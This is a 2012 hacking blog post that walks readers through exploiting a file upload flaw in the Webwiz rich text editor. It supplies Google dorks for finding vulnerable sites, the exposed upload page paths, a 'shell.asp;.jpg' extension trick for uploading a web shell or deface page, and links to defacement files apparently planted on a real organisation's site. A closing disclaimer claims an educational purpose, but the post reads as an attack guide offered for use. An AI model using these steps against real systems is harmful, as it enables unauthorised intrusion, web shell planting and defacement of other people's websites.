Trending: TeCh ZoNe

Sunday, April 8, 2012

Website hackz RTE webwiz vulnerability | file upload exploit



 RTE exploit: file upload vulnerability of Webwiz websites


Webwiz rich text editor HTML code is carried in the
open after they are sent charCode due functioning of the page 

Google Dorks: 

[1].inurl:rte/my_documents/my_files
[2].inurl:/my_documents/my_files/ 

search these dorks on google choose any website.

Exploit:
[1].website.com/rte/RTE_popup_file_atch.asp
[2].website.com/admin/RTE_popup_file_atch.asp



Site: http://www.example.com

http://www.example.com/RTE_popup_file_atch.asp

now you will receive a uploading option

you can also upload a shell or directly your deface

page shell format:- shell.asp;.jpg


live demo:

[1]http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/ZFZ_!nD!_C0d3_Br3ak3.html

[2]  http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/4FB_cyb3r_shr3y@sh.jpg 

author

This post was written by: shreyash tiwari

Shreyash tiwari is a professional blogger and HACKER, web designer and front end web developer. Follow him on facebook and TWITTER

Blog Warning:

HEY VISITORS THIS IS A NOTE FROM ADMIN:

THIS WEBSITE IS BUILD BY ME ONLY FOR EDUCATIONAL PURPOSE I JUST WANT TO PROVIDE CYBER TIPS SO IF U USE THESE INFORMATION TO HARM ANY SUBSTANCE,COMMUNITY OR PERSON AND GOT CAUGHT THEN I AM NOT RESPONSIBLE FOR IT SO MIND MY WORDS HACKING IS A CYBER CRIME DON'T CHEAT OTHERS WITH YOUR POWERS

KNOWLEDGE IS FOR SHARING ASK-SHARE

FOR MORE INFORMATION MAIL ME:
STSHREYASH50@GMAIL.COM
All Rights Reserved TeCh ZoNe | Blogger Template by Bloggermint
Sponsored by Florida Phone Book, Florida Accountants, Optician Jobs
back to top